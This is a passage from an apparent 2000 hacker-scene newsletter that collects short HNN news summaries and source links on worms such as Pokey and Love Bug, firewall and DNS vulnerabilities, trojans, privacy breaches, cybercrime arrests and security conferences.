      This worm appears as an email with the title "Pikachu Pokemon" and the 
      message "Pikachu is your friend." 
      
      Japanese antivirus firm Trend Micro advises anyone who receives the email 
      to delete the file without opening it. 
      
      Pokey bites less but bites harder 
      
      Earlier this year, the Love Bug raced around the world and caused damage 
      estimated from hundreds of millions to billions of dollars. Many major 
      corporations were forced to shut down their internal communications to 
      stamp it out. 
      
      It came as an email entitled "ILOVEYOU" with an attachment that, if 
      opened, infected the computer and emailed itself to everyone in the user's 
      Microsoft Outlook address book. 
      
      Pokey, aimed at children hooked on the worldwide Pokemon craze, has spread 
      more slowly and has not gone as far, giving antivirus software companies 
      like Symantec, Trend Micro, and Britain's Sophos time to mount a defense. 
      
      But once Pokey gets into your computer, its bite is far more deadly than 
      the Love Bug's. 
      
      It destroys all files in the Windows and System directories. The Microsoft 
      operating system, used by four-fifths of the world's computers, must be 
      reinstalled from scratch. 
      
      The Love Bug's most prevalent versions attacked data files such as 
      pictures, but left the whole system intact. 
      
      People want to be liked -- that's their weakness 
      
      With 50,000 worms wriggling around cyberspace, Chien said the key to an 
      effective one is to appeal to human emotions. "Love Bug was not really new 
      but the reason it hit so many people was social engineering. These things 
      require people to double-click on them to run them. And who doesn't like 
      to receive a love letter?" 
      
      Nintendo, the videogame company that owns the copyright to the wildly 
      popular Pokemon  or "pocket monster"  characters, was unavailable for 
      comment. 
      
      Trend Micro said that, surprisingly, the worm had not surfaced in Japan 
      yet. Europe also seems to be little affected so far. 

            Ironically, the Love Bug and the earlier Melissa virus may have helped 
      computer users defend themselves against viruses. They attracted so much 
      attention that many users now know they should treat unsolicited email 
      attachments with suspicion. Pokey, however, targets a group of users who 
      are not virus-savvy  young children. 
      
      Chien warned that as the mobile Internet grows, so will the risk of new 
      viruses that target cell phones and online pocket organizers. So far, 
      however, these devices have only suffered text-message (SMS) bombardments. 
      
      Chien advised people to practice safe surfing  since suspect websites 
      could also contain viruses  and to preach it to children. He said people 
      should stop thinking of computers as some kind of link to a virtual world 
      where real damage could not be done. 
      
      "These computers may take you into cyberspace  but they are also running 
      the world," he warned. 


      Copyright  2000 Reuters Limited. Limitations and Restrictions on Use

      @HWA
      

 100.0 [HNN] May 31'00 Canada To Dismantle Big Bro Database 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by freedom 
      Human Resources Minister Jane Stewart has relented to public pressure
      and has announced that the massive database containing information on
      nearly every Canadian is to be dismantled. The Longitudinal Labor
      Force File has already severed links with databases at the Revenue
      Department and other agencies. She said she will also be recommending
      legal protections for the information used in her department. Some
      experts doubt that the government will simply delete the data.
      
      Globe and Mail
      Ottawa Citizen
      Wired
      Newsbytes
      Canoe.com
      
      http://www.globeandmail.ca/gam/National/20000530/UBIGGN.html
      http://www.ottawacitizen.com/national/000530/4185962.html
      http://wired.com/news/politics/0,1283,36649,00.html
      http://www.newsbytes.com/pubNews/00/149805.html
      http://ads.canoe.ca/CNEWSTopNews/bigbro_may30.html
      @HWA
      
      
 101.0 [HNN] May 31'00 Resume Causes Little Damage 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Evil Wench 
      The much hyped 'Killer Resume' worm died a quite death over the
      weekend causing very little damage. It was feared that the Melissa
      variant would spread extremely fast on Tuesday morning when people
      came into work after the long holiday weekend.
      
      TechWeb
      Associated Press - via Nando Times
      
      http://www.techweb.com/wire/story/TWB20000530S0012
      http://www.nandotimes.com/technology/story/body/0,1634,500210254-50029
      4870-501612274-0,00.html
      @HWA
      
      
 102.0 [HNN] May 31'00 Hong Kong Pirate Piracy Troubles 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by acopalyse 
      More than half of all software used in Hong Kong is pirated, software
      piracy reported by BSA losses from software piracy exceeded $12
      billion worldwide in 1999 and topped $59 billion over the last five
      years, according to the BSA-commissioned survey.
      
      CNN
      
      http://www.cnn.com/2000/ASIANOW/east/05/29/hk.piracy.reut/index.html
      @HWA
      
      
 103.0 [HNN] May 31'00 New Zealand Man Claims Virus Info Stolen 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       contributed by William Knowles 
      A New Zealand man claims that he has stumbled onto the biggest hole in
      MS outlook yet. The hole would allow malicious Java code to be
      executed on a Windows/Outlook machine without any user intervention.
      He said that soon after he contacted Microsoft the information was
      stolen off his computer by someone who broke into it. Microsoft says
      that they never received his initial communication and after reviewing
      his information claim that there is no security breach involved.
      
      The New Zealand Herald
      
      http://www.herald.co.nz/storydisplay.cfm?storyID
      @HWA
      
      
 104.0 [HNN] May 31'00 Bank Manager Executed 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             
      contributed by root66 
      After manipulating computer records to divert money into his own
      accounts, Shen Weibiao the former bank manager of a Bank of China
      branch in Shaoguan city, was executed after the Supreme People's Court
      rejected his appeal. While the means of his execution was not released
      most mainland China executions are done by gunshot.
      
      South China Morning Post
      
      http://www.scmp.com/News/China/Article/FullText_asp_ArticleID-20000530
      131544704.asp
      @HWA
      
      
 105.0 [HNN] May 31'00 Malaysian ISP Suffers Human Error Security Breach 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             
      contributed by dhillon 
      Mimos Berhad, a government funded research corporation and ISP, has
      admitted that an employee accidentally placed a large number of
      confidential files on a publicly accessible web server.
      
      Newsbytes
      
      http://www.newsbytes.com/pubNews/00/149718.html
      @HWA
      
      
 106.0 [HNN] May 31'00 Defcon Updates Web Site 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Dark Tangent 
      Defcon has updated its site with a more complete list of speakers and
      DJs for this years convention in Las Vegas. Some lost video from DC 2
      and DC 6 has been found and put on-line! What did Artimage look like
      six years ago? Now the truth can be seen! Bonus: The writer of "Enemy
      of the State" will be screening a copy of the movie on the roof, and
      take Q&A after. Can't make it this year? There will be streaming media
      of the talks and DJs available.
      
      Defcon 8
      
      http://www.defcon.org
      @HWA
      
      
 107.0 [HNN] May 31'00 SWAT Hits Issue 29 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by The Firestarter 
      The UK's longest running underground e-zine, SWAT has just released
      it's 29th issue on their web site.
      
      Swateam
      
      http://www.swateam.org
      @HWA
      
 
 108.0 [HNN] June 01'00 Pennsylvania Passes Anti-Virus Law 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by acopalyse 
      It is now a crime to spread computer viruses in Pennsylvania.
      Legislation signed last week will carry a seven year jail sentence
      including damage reimbursement for those found guilty.
      
      Newsbytes - via Yahoo
      
      http://asia.dailynews.yahoo.com/headlines/technology/article.html?s
      @HWA
      
      
 109.0 [HNN] June 01'00 MLB Practices Security Through Obscurity 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        
      contributed by Evil Wench 
      Determined not to have a repeat of last year Major League Baseball has
      initiated an email address verification scheme to during its All-Star
      balloting. Last year the ballot box for Boston Red Socks shortstop
      Nomar Garciaparra was fraudulently stuffed with 39,000 extra ballots.
      This year all email addresses will be verified and audited by a secret
      system. "There are a few folks out there we'd just assume not know
      what we're doing," said Tim O'Mara, senior vice president of
      operations for Bellevue, Wash.-based SeasonTicket.com Inc., which is
      in charge of this year's electronic tabulations. (Failing to make the
      procedure public invites suspicion on the integrity of the overall
      process as well as inviting people who are looking for a challenge.)
      
      Computer World
      
      http://www.computerworld.com/home/print.nsf/all/000526E3A2
      @HWA
      
      
 110.0 [HNN] June 01'00 Pr0n Detection Software 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by no0ne 
      Software that scans photos for flesh tones and curves to detect nudity
      is being beta tested by Oklahoma based company Heartsoft Inc.
      Heartsoft has applied for a patent for this technology. It will be
      used in conjunction with the company's Internet Safari browser for
      children. (I can think of a few other good uses as well.)
      
      Newsbytes
      
      http://www.newsbytes.com/pubNews/00/149866.html
      @HWA
      
      
 111.0 [HNN] June 01'00 Fighting the Privacy Bootleggers 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             
      contributed by root66 
      The Gramm-Leach-Bliley Act has made it extremely easy for banks,
      insurance companies, and investment corporations to compile, share and
      sell information about you. Prohibited from doing so during the Great
      Depression these companies are now able to cross reference their
      databases and come up with all sorts of information about you. Yes,
      there are ways to Opt-Out but they are difficult and arcane.
      
      PC World - via CNN
      
      http://www.cnn.com/2000/TECH/computing/05/31/privacy.law.idg/index.htm
      l
      @HWA
      
      
 112.0 [HNN] June 01'00 Marcia Clark Calls Hackers "Undersocialized Schizoids" 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Commodore Sloat 
      Well-dressed former prosecuting attorney Marcia Clark (yeah yeah, from
      the OJ trial) has a column on APB News where she lambastes hackers as
      pathological misfits "of barely average intelligence." As is typical
      of such columns, "hackers" are lumped together with any criminal with
      a computer.
      
      APB News
      
      http://apbnews.com/newscenter/clark/2000/05/31/clark0531_01.html
      @HWA
      
      
 113.0 [HNN] June 01'00 Fake Census Takers on the Prowl 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Evil Wench 
      In an effort to scam people out of their Social Security and Bank
      Account numbers people posing as fake Census takers are calling on
      households. There have been scattered reports of impostors in
      Arkansas, North Dakota, and northeastern Pennsylvania. The con artists
      seem to be targeting elderly people.
      
      Associated Press - via Yahoo
      
      http://dailynews.yahoo.com/h/ap/20000601/pl/census_scams_1.html
      @HWA
 
 
 114.0 [HNN] June 02'00 Top Ten Internet Security Problems 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
            
      contributed by Marc 
      The SANS Institute has issued a report detailing the top ten security
      issues facing the Internet today. They include weaknesses in BIND,
      CGIs, RPCs, RDS, Sendmail, Global Filesharing, Weak User IDs and
      passwords, IMAP and POP buffer overflows, and SNMP community strings
      set to 'public'. The report describes each problem, lists CVE entries
      and offers advice on how to correct the issue.
      
      SANS
      PC World
      Federal Computer Week
      
      http://www.sans.org/topten.htm
      http://www.pcworld.com/pcwtoday/article/0,1510,17005,00.html
      http://www.fcw.com/fcw/articles/2000/0529/web-topten-06-02-00.asp
      @HWA
      
      
 115.0 [HNN] June 02'00 MPAA Attempts to Bar Press From Hearings 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Macki 
      Lawyers for the Motion Picture Association of American have asked the
      court to seal the upcoming hearings involving 2600 and to keep court
      records private. MPAA feels that releasing the names of its employees
      involved in anti-piracy efforts would place in harm's way. They are
      also concerned about releasing information regarding their anti-piracy
      operations.
      
      2600
      Court Brief
      
      http://www.2600.com/news/2000/0601.html
      http://www.2600.com/dvd/docs/2000/0531-mpo.html#kaj
      @HWA
      
      
 116.0 [HNN] June 02'00 Anti-Virus Vendors Blame Media for Virus Hype 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by root66 
      Anti-Virus vendors are calling for an established unified grading
      system to categorize viruses to prevent the media from getting into a
      feeding frenzy and spreading hype and misinformation (aka FUD). They
      site the recent 'resume' scare as an example.
      
      Silicon.com
      
      http://www.silicon.com/a37811
      @HWA
      
      
 117.0 [HNN] June 02'00 Summercon 2000 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      Summercon 2000, presented by r00t, Phrack Magazine, FEH, & 9mm, will
      be held this weekend on June 2nd through the 4th. The conference will
      be at the Omni Hotel @ CNN Center in Atlanta, GA. Summercon is the
      longest continuously run con still in existence.
      
      Summercon
      
      http://www.summercon.org/
      @HWA
      
      
 118.0 [HNN] June 02'00 India's First Cyber Criminal Arrested 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             
      contributed by no0ne 
      A 24 year old computer engineer has been arrested by the Indian Police
      for stealing over 100 hours of internet time. After being called to
      activate the account of a retired army officer, the service engineer
      changed the password of the account and later accessed it from 10
      different locations.
      
      BBC
      
      http://news.bbc.co.uk/hi/english/world/south_asia/newsid_773000/773025
      .stm
      @HWA
      
      
 119.0 [HNN] June 02'00 Libnet for NT Now Available 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Marc 
      eEye Digital Security has released LibnetNT as an open source project
      to help speed development. LibnetNT is similar to the popular Unix
      Libnet which is used to implement low level packet functionality into
      a program. LibnetNT has the exact same functionality and abilities as
      Libnet except LibnetNT can be used to develop low level packet
      injection programs on Windows NT4.0 and Windows NT5.
      
      eEye Digital Security
      
      http://www.eeye.com/html/Databases/Software/libnetnt.html
      @HWA
      

 120.0 [HNN] June 05'00 FW-1 Vulnerable to Fragmented Packets 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             
      contributed by Lance 
      An advisory posted to BugTraq this morning indicated that every
      Firewall-1 installation may be susceptible to a DoS attack from
      incomplete or illegal packet fragments. Since FW-1 waits until it has
      a complete packet before it inspects or logs the information filter
      rules will not help. Checkpoint has reportedly developed a short term
      solution (We could not find it on their web site this morning) and are
      working on a long term fix to be rolled out in a later service pack.
      
      BugTraq - via Security Focus
      Checkpoint
      
      http://www.securityfocus.com/templates/archive.pike?list
      http://www.checkpoint.com
      @HWA
      
      
 121.0 [HNN] June 05'00 Australian Tax Office Sells Private Info 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by tall.drink 
      Privacy Commissioner, Mr Malcolm Crompton, has stated that the
      Australian Taxation Office had broken privacy laws by releasing
      personal information supplied by individual applicants for an
      Australian Business Number. The ABN application form states that the
      name, address, e-mail address, phone number, etc of applicants will
      remain 'confidential' It dies not say that anyone can purchase this
      information for $20, a clear violation of Australia's Privacy Act. The
      Tax Office will develop guidelines to prevent this from occurring in
      the future. (I guess we can all rest easy now.)
      
      Sydney Morning Herald
      
      http://www.smh.com.au/news/0006/06/national/national5.html
      @HWA
      
      
      
 122.0 [HNN] June 05'00 British Have Lost Dozens of Laptops 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by William Knowles 
      Britain's Ministry of Defense has revealed that since May of 1997 it
      has had 59 laptops stolen and 8 'lost' by staff members. The numbers
      where revealed in a written explanation to the House of Commons
      yesterday. (How do you loose a laptop?)
      
      Associated Press - via Nando Times
      
      http://www.techserver.com/noframes/story/0,2294,500212323-500298954-50
      1646000-0,00.html
      @HWA
      
      
 123.0 [HNN] June 05'00 S.2448 Analysis 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      An analysis of S.2448 the Internet Integrity and Critical
      Infrastructure Protection Act of 2000 has been posted to Cipherwar.
      The analysis looks at each provision of the bill and what it means.
      The bill was introduced in April and has been referred to the
      Committee on the Judiciary.
      
      Cipherwar
      S.2448 - Senate.gov
      
      http://cipherwar.com/news/00/s2448_hacking.htm
      http://rs9.loc.gov/cgi-bin/query/D?c106:3:./temp/~c10690I7Wg::
      @HWA
      
      
 124.0 [HNN] June 05'00 Spammer Busted For Online Tampering 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Code Kid
      Jason Garon, 46, of Mission Viejo, CA., has been arraigned on charges
      of forgery and computer tampering after using the computer systems of
      Max Vision, a New York state company, to send millions of email
      advertisements for porn sites. If convicted he could be sentenced to
      up to seven years in prison. The District Attorney said that this is
      the first case involving online forgery in the country.
      
      Associated Press - via C|Net
      
      http://news.cnet.com/news/0-1005-200-2024887.html?tag
      @HWA
      
      
 125.0 [HNN] June 05'00 Cell Phone Viruses? 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      Next generation cell phones that include programmability and internet
      access may become susceptible to new forms of viruses. These new
      viruses may reroute phone calls, record conversation, rack up huge
      phone bills, as well as delete data and cause general mayhem. (In
      reality this isn't all that far fetched but this article is just full
      of FUD.)
      
      Fox News
      
      http://www.foxnews.com/vtech/060100/cellvirus.sml
      @HWA
      

 126.0 [HNN] June 07'00 SPAM Worm Hits Cell Phones In Spain 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Lady Sharrow 
      Users of the Spanish cell phone company Telefonica are being hit by
      the Timofonica Worm. While Timofonica does not infect cell phones
      directly it does send annoying email messages to users. The worm is
      spread through conventional email and includes a rant against the
      state owned Telefonica monopoly. When users open the .vbs attachment
      it sends an email to an email-GSM gateway with a random user ID where
      the message is then sent to cell phones.
      
      The Register UK
      ZD Net
      MSNBC
      Internet News
      Reuters - via Yahoo
      Associated Press - via Nando Times
      
      http://www.theregister.co.uk
      http://www.zdnet.com/zdnn/stories/news/0,4586,2583104,00.html
      http://www.msnbc.com/news/417066.asp?cp1
      http://www.internetnews.com/intl-news/article/0,2171,6_388331,00.html
      http://dailynews.yahoo.com/h/nm/20000606/tc/virus_phone_dc_1.html
      http://www.nandotimes.com/technology/story/body/0,1634,500212951-50030
      0231-501656210-0,00.html
      @HWA
      
      
 127.0 [HNN] June 07'00 MafiaBoy to Get New Charges 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse 
      Mafiaboy was arrested for DDoS attacks on high-profile Internet sites
      back in February but has only been charged with the attack on CNN.
      Canada's crown prosecutor Louis Miville-Deschenes will now bring
      additional charges of the same type but for attacks against different
      sites.
      
      Agence France Press - via Nando Times
      
      http://www.nandotimes.com/technology/story/0,1643,500212784-500299842-
      501653573-0,00.html
      @HWA
      
      
 128.0 [HNN] June 07'00 CheckPoint Posts Temp Fix for FW-1 Vulnerability 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Boyd 
      Checkpoint has posted an interim work around for the IP
      Fragment-driven denial of service attack announced yesterday. The work
      around involves a command line instruction that will disable console
      logging.
      
      Checkpoint FW-1 Fix
      BugTraq - original advisory
      
      http://www.checkpoint.com/techsupport/alerts/ipfrag_dos.html
      http://www.securityfocus.com/templates/archive.pike?list
      @HWA
      
      
 129.0 [HNN] June 07'00 Air Force Blocks Access to Museum Web Site 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by no0ne
      Soldiers of Peterson Air Force Base in Colorado are not allowed to
      access the web site of San Francisco based Science museum
      Exploratorium. The reason, according to museum officials, is that they
      have the recipe for "bubble bomb" up on their site. Bubble bomb is an
      experiment in which vinegar and baking soda are mixed in a plastic
      bag, a chemical reaction takes place, in turn causing the bag to
      explode. (Kids in grade schools do this for science class, right?)
      
      Associated Press- via San Jose Mercury News
      
      http://www.mercurycenter.com/breaking/docs/016603.htm
      @HWA
      
      
 130.0 [HNN] June 07'00 Mounties Fall Behind Crooks in Online Crime 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Brian 
      Years of deep budget cuts have left the Canadian Mounties far behind
      the criminals when dealing with online crime. officials hope that the
      recent approval of $543-million in new funds will help narrow that
      gap. The RCMP has lost several good officers to the private sector
      recently but hopes to train 1,200 to 1300 new Mounties this year.
      
      National Post
      
      http://www.nationalpost.com/financialpost.asp?f
      @HWA
      

 131.0 [HNN] June 08'00 Accused in ILOVEYOU virus case set free 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by weld pond 
      The 27 year old bank employee, Reonel Ramones, suspected in the "Love
      Bug" virus case has been freed because there is no law in the
      Phillipines under which he could be prosecuted. He did nothing
      illegal.
      
      CNN
      San Jose Mercury News
      http://cnnfn.com/2000/06/07/worldbiz/wires/love_wg/
      http://www.mercurycenter.com/svtech/news/breaking/merc/docs/020797.htm
      @HWA
      
        
 132.0 [HNN] June 08'00 Kevin Mitnick Talks About Jobs in Computer Security 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by silicosis 
      Kevin Mitnick and a range of people from the computer underground are
      interviewed about working in the computer security industry.
      
      CIO Magazine
      
      http://www.cio.com/archive/060100_con.html
      @HWA
      

 133.0 [HNN] June 08'00 Australia passes law legalizing government computer intrusions 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by apocolypse
      The Telecommunications (Interception) Legislation Amendment Bill 1999
      was passed through Australian Parliament. The new bill aims to aid law
      enforcement officers investigating criminal activities and
      intelligence collection by the Australian Security Intelligence
      Organization. This latest bill adds to legislation passed last year
      that gave ASIO, Australia's internal security service, the right to
      hack into any Australian's computer.
      
      Newsbytes
      
      http://www.newsbytes.com/pubNews/00/150247.html
      @HWA
      
    
 134.0 [HNN] June 08'00 Press allowed to cover MPAA depositions 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by apocolype 
      The Motion Picture Association of America (MPAA) loses its bid to stop
      public scrutiny of proceedings in a lawsuit targeting an online
      distributor of freely available DVD-cracking technology. Yesterday's
      ruling marked a victory for freedom of expression and society's access
      to its courts, Robin Gross an attorney with the Electronic Frontier
      Foundation (EFF) said today. The San Francisco- based civil liberties
      group is backing the defense of 2600 Magazine and is representing
      defendants in a similar case in California.
      
      Newsbytes
      Ruling via Cryptome
      2600
      
      http://www.newsbytes.com/pubNews/00/150243.html
      http://cryptome.org/mpaa-v-2600-spo.htm
      http://www.2600.com/news/2000/0608.html
      @HWA
      
    
    
 135.0 [HNN] June 08'00 Vulnerability in free mail services found 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by apocolype 
      Lycos' WhoWhere fixes a problem affecting millions of email accounts
      that allowed intruders to peruse email and send messages as though
      accounts were their own. Lycos would not say how many people have
      registered for the company's MailCity service, nor would they estimate
      how many other accounts may have been at risk or how long the bug
      might have existed.
      
      CNET
      http://news.cnet.com/news/0-1005-200-2036086.html?tag
      @HWA
      
        
 136.0 [HNN] June 08'00 OnStar service can unlock car doors 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by evenprime 
      The OnStar system allows OnStar to call into your car and control your
      door locks, the horn, and the lights. Very secure and very proprietary
      systems protect your OnStar system from being abused by attackers.
      
      Risk Digest
      http://catless.ncl.ac.uk/Risks/20.90.html#subj2
      @HWA
      

 137.0 [HNN] June 09'00 Thousands of trojaned computers found 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by weld pond 
      The Justice Department has been notified that thousands of computers
      have been found with trojan remote control software installed. A file
      which looked like a movie clip actually contained remote control
      software which has been dubbed the "Serbian Badman Trojan".
      
      AP
      
      http://news.excite.com/news/ap/000609/02/hacker-attack
      @HWA
      
      
 138.0 [HNN] June 09'00 Investigative Report: Female Hackers 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by weld pond
      ABC News investigates the female side of the hacker subculture. This
      largely male dominated world presents special chalenges to women.
      Scene whores, hacker hangouts, and the non-sexist elite are covered.
      
      ABC News
      
      http://abcnews.go.com/sections/tech/DailyNews/hackerwomen000609.html
      @HWA
      
      
 139.0 [HNN] June 09'00 ISS founder is a white hat hacker 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      LinuxWorld profiles Christopher Klaus, the founder of ISS. The origins
      of his company and products are discussed as well as their current
      classes in Linux security.
      
      LinuxWorld
      
      http://www.linuxworld.com/linuxworld/lw-2000-06/f_lw-06-iss.html
      @HWA
      
      
 140.0 [HNN] June 09'00 80,000 DNS Domain Server Vulnerable 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse
      80,000 domains make up about 75 percent of the domain name system
      (DNS) in Australia and New Zealand. Theses DNS servers are vulnerable
      to Denial-of-Service attacks, and 55 percent may be compromised at the
      root level. One security threat for vulnerable DNS systems is that a
      hijacker could point a site's DNS to a proxy server, capture important
      information, then send data back to the genuine server with the
      interception unnoticed.
      
      ZDNET
      
      http://www.zdnet.com.au/enterprise/security/stories/au0003277.html
      @HWA
      
      
 141.0 [HNN] June 09'00 Lewis Koch on Winn Schwartau 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by mcintyre
      Lewis Koch has an opinion piece about Winn Schwartau. This quote says
      it all: "It's not that hackers present no real danger. In fact, we
      need a sober analyst of Internet reality, someone who can identify who
      is doing real damage and how that damage can legitimately be monitored
      and contained. But Schwartau, peddling his Cybershock warning of a
      virtual doomsday, is just another hysterical infowarrior playing to
      our primal burrowing instincts."
      
      Interactive Week
      
      http://www.zdnet.com/intweek/stories/columns/0,4164,2584807,00.html
      @HWA
      
      
 142.0 [HNN] June 09'00 Television takes on computer crime 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by PhantasmP and Weld Pond 
      There are be 2 upcoming shows on TV relating to computer security. The
      first is on A&E Networks respected Investigative Reports. The show is
      titled "e-terror" and airs Wed, June 14 at 10pm. The show will be an
      indepth look at security on the internet. People from NIPC, the
      military, and the L0pht will be interviewed.
      
      Investigative Reports
      
      This Saturday (May 13th) America's Most wanted is airing an episode
      about cyber terrorism. The write up in the print edition of TV Guide
      is as follows: "Examining U.S. government efforts to stop criminal
      computer hackers, who can disrupt vital city services." The online
      edition says "Cyber-Criminals Special Edition: An overview of cyber
      terrorism includes easy targets; wide-ranging effects; and a profile
      of a dangerous hacker." The show is scheduled to air at 9pm EST on FOX
      Networks.
      
      America's Most Wanted
      
      http://www.aande.com/tv/shows/billkurtis/irhighlights.html#e-terror
      http://www.amw.com/
      @HWA
      
      
 143.0 [HNN] June 09'00 Top 50 Security Tools Survey 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by weld pond 
      1200 nmap users were surveyed about their favorite security tools.
      Open source tools ruled the day. The survey include descriptions and
      pointers to the distribution sites.
      
      Fyodor's Good Reading List
      
      http://www.insecure.org/tools.html
      @HWA
      

 144.0 [HNN] June 12'00 NETSEC Discovers Nothing New 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Frank 
      Last Friday's announcement by NETSEC (Network Security Technologies)
      of a new DDOS tool installed on thousands of computers world wide
      created a lot of media attention but was really nothing new. The so
      called 'Serbian Badman Trojan' is nothing more than a repackaged
      version of Sub7, a remote administration tool similar to NetBus, that
      has been around for years. Sub7 is incapable of launching a DDoS
      attack in its current revision. NETSEC's discovery amounts to nothing
      more than a publicity stunt by an opportunistic security firm in quest
      of free advertising in the form of media attention.
      
      The UK Register
      ZD Net
      Symantec
      Network Associates
      Commandcom
      
      Late Update: 120412JUN00
      NetSec has sent us an email explaining their position.
      
      NetSec Responce
      
      http://www.theregister.co.uk/content/1/11290.html
      http://www.zdnet.com/zdnn/stories/news/0,4586,2585554,00.html?chkpt
      http://www.symantec.com/avcenter/venc/data/serbian.trojan.html
      http://vil.nai.com/villib/dispvirus.asp?virus_k
      http://www.commandcom.com/virus/downtroj.html
      @HWA
      
      
 145.0 [HNN] June 12'00 Brazilian Telephone Users Privacy Breached 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by i_l00p 
      The personal data of millions of customers of the Brazilian telephone
      monopoly Telephonica, can be purchased on the street for R$10. The CD
      contains name, address, phone number (including unlisted numbers), and
      CPF number (which is similar to a social security number). Telephonica
      has admitted that they knew that the information was available since
      June of last year.
      
      Estado - Portuguese
      
      http://www.estado.com.br/editorias/2000/06/02/cid690.html
      @HWA
      
      
 146.0 [HNN] June 12'00 Dozens of Malaysian Sites Defaced 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by mortel 
      Attackers have broken into dozens of Malaysian political Websites,
      leaving government officials and opposition leaders fuming Sunday over
      images of rotting skulls and obscene messages. One vandal, calling
      himself "Xenophoria", attacked 21 pro-government Websites, posting a
      list of demands for greater press freedom and an end to corruption.
      
      Associated Press - via Yahoo
      
      http://dailynews.yahoo.com/h/ap/20000611/tc/malaysia_cyber_havoc_1.html
      @HWA
      
      
